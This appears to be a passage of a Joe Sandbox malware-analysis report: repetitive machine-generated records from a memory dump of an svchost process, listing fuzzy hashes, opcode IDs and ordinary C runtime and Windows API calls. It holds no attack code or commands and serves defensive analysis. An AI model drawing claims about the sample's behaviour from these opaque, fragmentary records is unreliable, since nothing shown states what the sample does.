                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$ByteCharMultiWide$_errno_wfopenmalloc
                                                                • String ID:
                                                                • API String ID: 26091681-0
                                                                • Opcode ID: 0375d0a80efc25c1632f5b2a13e08bbf5fe38608e71b0cbecf084b794a4d6a9c
                                                                • Instruction ID: 3b54c8b77c870b374065e46c71d3fdcfdeb76b7c2f60cc21b7751f106cfae0e6
                                                                • Opcode Fuzzy Hash: 0375d0a80efc25c1632f5b2a13e08bbf5fe38608e71b0cbecf084b794a4d6a9c
                                                                • Instruction Fuzzy Hash: 93F01239709E5542F9665B92ED442AED3B4AB49FD0FC94420DD2E0BF49EF6CC6465300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=
                                                                • String ID: %u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT
                                                                • API String ID: 356670603-632690687
                                                                • Opcode ID: c139e50391b70ccb2fa4ff49b315b3c0ef2b79c9b06f4873976a75099094eb7b
                                                                • Instruction ID: 84033f5155db2605562988b7ba75820cb5c359edfe01e54feaf8fb267a69a663
                                                                • Opcode Fuzzy Hash: c139e50391b70ccb2fa4ff49b315b3c0ef2b79c9b06f4873976a75099094eb7b
                                                                • Instruction Fuzzy Hash: DB41813A21C68541FB328BA4D5903E9E7F5F746BC0FC44011EAAD46A95FBA8C742E740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupstrcspn
                                                                • String ID: () {%*]\"
                                                                • API String ID: 3695213020-4142237831
                                                                • Opcode ID: 89d4a67e625d9b8a49ff68337f47ee4a115f86f08829ce9b1e7f958f16d99cf7
                                                                • Instruction ID: f2c935f268bf7c378e322a26527f0603874bb958a69bbf7d6a600e608bc8c2b3
                                                                • Opcode Fuzzy Hash: 89d4a67e625d9b8a49ff68337f47ee4a115f86f08829ce9b1e7f958f16d99cf7
                                                                • Instruction Fuzzy Hash: 6331C77521C65582FB309BA2E8403DAD3B0A794FD8FC80215D9BD466D5FB58C782A740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=
                                                                • String ID: FALSE$TRUE
                                                                • API String ID: 356670603-1412513891
                                                                • Opcode ID: 03abd6730b94028f8763ce21799859eead7c6dadb3cf727f05930935d344efe6
                                                                • Instruction ID: db669fcef67412bf91b553f15db88c2081aca9f29e75efc0e92f896700324452
                                                                • Opcode Fuzzy Hash: 03abd6730b94028f8763ce21799859eead7c6dadb3cf727f05930935d344efe6
                                                                • Instruction Fuzzy Hash: 0A11373A718B5585EB229BA5E8403DDA3B1F346BC8FC00016DE1D57799EF69C686D340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: freememchr
                                                                • String ID:
                                                                • API String ID: 3588846894-0
                                                                • Opcode ID: ecd64efe92de18348549a7f54997d043584ff7eec4dc6e9751064a17b2e88cd4
                                                                • Instruction ID: 9605410cbea67880ad9e7d5efb17052b3212c44c89b6a54298aa987c0af42a09
                                                                • Opcode Fuzzy Hash: ecd64efe92de18348549a7f54997d043584ff7eec4dc6e9751064a17b2e88cd4
                                                                • Instruction Fuzzy Hash: E341847930AB8491FE369F96E5043D9D2A5BB44FC0F9C45399E6D1BB84FB38D643A200
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162705
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162718
                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016273F
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016274C
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                • String ID:
                                                                • API String ID: 2605342592-0
                                                                • Opcode ID: 931d6c35e9fe268eca5583942666c254eb2cd039136a9fc39b460f039c27a7a2
                                                                • Instruction ID: 31761be0ea6671d26b294de0320ec26b7de081701ff522448cfac19f8108c469
                                                                • Opcode Fuzzy Hash: 931d6c35e9fe268eca5583942666c254eb2cd039136a9fc39b460f039c27a7a2
                                                                • Instruction Fuzzy Hash: 62015639708B9081EA34DB9AF96015AB6B1BB89FD4F984235DE6D47F94EF38C5409700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$memset
                                                                • String ID:
                                                                • API String ID: 2717317152-0
                                                                • Opcode ID: 2b1dc2818ecf8dc806e4130d1acf5419a652ad905e6fe6ce4fc11dbb93dd343d
                                                                • Instruction ID: 380800acd5f407f14dc3bd2c808f2f9b863e02a2c5a9b54f39d2d48c7314a32e
                                                                • Opcode Fuzzy Hash: 2b1dc2818ecf8dc806e4130d1acf5419a652ad905e6fe6ce4fc11dbb93dd343d
                                                                • Instruction Fuzzy Hash: 78118932918B8082E710DF75D9803ACA3B0FBA9F88F405306DE9802629FF30C6D0C340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: f635f827b8e96118afdf7968be939b1854f014a7f653dba6dbc723d86cd3ecaa
                                                                • Instruction ID: 0c72e370bccd9185219d1a1a394e429d84543552d5d78cbc5de24b8cb0056b52
                                                                • Opcode Fuzzy Hash: f635f827b8e96118afdf7968be939b1854f014a7f653dba6dbc723d86cd3ecaa
                                                                • Instruction Fuzzy Hash: EE011E39619B5181FA64DB96E89439DA3B0B788FD0F881121EEAE07B55FF38C5429740
                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EBCD,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D0179661
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EBCD,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017966B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EBCD,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D0179675
                                                                  • Part of subcall function 00000173D01680A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000173D017978E,?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?), ref: 00000173D01680D7
                                                                  • Part of subcall function 00000173D01680A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000173D017978E,?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?), ref: 00000173D01680F7
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EBCD,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D0179690
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: cf8c19424e0a4b96fc0f2330f5a49ced331e330c04acc1dd072ecd1812284f7d
                                                                • Instruction ID: ad4da6e9e97061898799922e9d3725d0b8603cbc35be0b0ed39bba273d841ab5
                                                                • Opcode Fuzzy Hash: cf8c19424e0a4b96fc0f2330f5a49ced331e330c04acc1dd072ecd1812284f7d
                                                                • Instruction Fuzzy Hash: 34E0E539219815C1FF64AFA5DC942AC9330EB98F95FD412119D2E42165FF24CA8AD350